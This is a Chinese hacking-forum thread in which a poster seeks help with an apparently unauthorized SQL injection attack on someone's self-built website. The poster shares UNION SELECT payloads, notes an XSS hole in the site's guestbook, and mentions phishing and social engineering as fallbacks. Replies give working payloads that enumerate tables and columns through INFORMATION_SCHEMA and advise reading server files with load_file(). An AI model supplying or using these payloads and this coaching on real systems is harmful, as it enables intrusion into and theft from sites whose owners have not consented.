[讨论]php注入找不到列名怎么办?
[讨论]php注入找不到列名怎么办?信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
议题作者: ゛小︷帅!﹊
不知道列名,看网站的样子是个人自己做的,也比较大。但是存在php注入。
用的是支持union查询的mysql(术语不专业勿笑!)
复制内容到剪贴板
代码:
union select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATISTICS/*
出现sq_blmk、bbs、b_id
当我提交
复制内容到剪贴板
代码:
an 1=2 union select b_id,2,3 from bbs /*
返回一个10,就是1那个位置被代替了
复制内容到剪贴板
代码:
and 1=2 union select 1,2,3 from bbs where b_id=10 /*
我实在找不到。后台的原文件里的2个列名不对,看起来是正常的,但是就是不对的
复制内容到剪贴板
代码:
{
if (ltrim(document.login_form.pma_username.value)=="") {
alert("请填写您的帐户ID!");
return false;
}else if (ltrim(document.login_form.pma_password.value)=="") {
alert("请填写您的登陆密码!");
return false;
}else {
document.login_form.action="login.php";
document.login_form.method="post";
return true;
}
}
列名带进去无法返回。
SO,小菜不知道下步怎么解决,是否可以用模糊查找?
ps:账号看起来不是root权限的。
用loadfile()读过了。没反应……
当然,HDSI,什么什么的工具+字典也试了,还是不行。
留言存在xss跨站。
在那钓鱼就算了,我也没那个闲情,学这个php注入花了3天,阅读了大量的文献资料。
实在不行,我可能要用社会工程学。不排除(见笑!)
但是……小菜不才,特来请教各位大牛。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=137433&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=137433&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-80082.html]沉渊[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 试试从information_schema.tables和information_schema.columns里面去暴。
p.s:建议多看看angel他们以前的文章,虽然很老,但是很经典Dreamless world……
帖子25 精华[url=http://forum.eviloctal.com/digest.php?authorid=80082]0[/url] 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=80082]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106495&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106495&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然 引用:
试试从information_schema.tables和information_schema.columns里面去暴。
暴不出。
看来我得继续看文章去了。
谢谢你提供的一些思路和参考,小菜感激不尽。 [img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img]
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106497&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106497&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-65230.html]akens[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 先用union%20select%200,1,TABLE_NAME,3,4%20FROM%20INFORMATION_SCHEMA.TABLES--把所有的表暴出来
再用union%20select%200,1,COLUMN_NAME,3,4%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=要查询的表名
屡试不爽
帖子22 精华[url=http://forum.eviloctal.com/digest.php?authorid=65230]0[/url] 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=65230]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106691&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106691&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-585.html]fatcat[/url] [img]http://forum.eviloctal.com/images/avatars/pw/2.gif[/img]
晶莹剔透§烈日灼然 如果知道路径的话,用经典注射是能够读出源码的。很多时候由于页面关系显示不出代码,其实一般基本可以loadfile()。
其实一般情况MYSQL4以上加上路径的话基本可以搞,不过MYSQL3我就一直搞不来晕啊晕
帖子45 精华[url=http://forum.eviloctal.com/digest.php?authorid=585]0[/url] 积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=585]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106735&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106735&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然 引用:
如果知道路径的话,用经典注射是能够读出源码的。很多时候由于页面关系显示不出代码,其实一般基本可以loadfile()。
其实一般情况MYSQL4以上加上路径的话基本可以搞,不过MYSQL3我就一直搞不来
谢谢你的指导。
但是mysql.
这个是需要root权限的
我所搜到的不是root 权限的
loadfile()
读不出来。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106768&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106768&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-102337.html]longhai[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 知道路径,就用经典注射读出源码。
帖子20 精华[url=http://forum.eviloctal.com/digest.php?authorid=102337]0[/url] 积分63 阅读权限40 性别男 在线时间6 小时 注册时间2007-4-4 最后登录2008-4-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=102337]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=106770&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=106770&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-75365.html]yinhao[/url] [img]http://forum.eviloctal.com/images/avatars/pw/kawayi1.gif[/img]
晶莹剔透§烈日灼然 这个暴库的前提条件是 数据库版本>5的
[url=http://wpa.qq.com/msgrd?V=1&Uin=234117693&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=75365]0[/url] 积分29 阅读权限40 性别男 在线时间6 小时 注册时间2007-1-28 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=75365]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=107427&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=107427&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-45527.html]nixilin[/url] [img]http://forum.eviloctal.com/images/avatars/pw/god2.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第1楼沉渊于2007-12-28 17:12发表的 :
试试从information_schema.tables和information_schema.columns里面去暴。
p.s:建议多看看angel他们以前的文章,虽然很老,但是很经典
相当受用…… [img]http://forum.eviloctal.com/images/smilies/yangcong/55.gif[/img]
To LZ 用user()就可以查看当前连接数据库的用户名了。。
[url=http://wpa.qq.com/msgrd?V=1&Uin=52578601&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子87 精华[url=http://forum.eviloctal.com/digest.php?authorid=45527]0[/url] 积分298 阅读权限40 性别男 在线时间26 小时 注册时间2006-4-22 最后登录2008-7-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=45527]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=107486&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=107486&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-67853.html]jxsaqjh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第6楼longhai于2008-01-01 00:35发表的 :
知道路径,就用经典注射读出源码。
不是ROOT用什么读文件?jxsaqjh.cn
[url=http://wpa.qq.com/msgrd?V=1&Uin=75320216&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子36 精华[url=http://forum.eviloctal.com/digest.php?authorid=67853]0[/url] 积分99 阅读权限40 性别男 在线时间15 小时 注册时间2006-10-23 最后登录2008-4-9 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67853]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31712&repquote=107511&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31712&pid=107511&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-162484.html]kosi[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]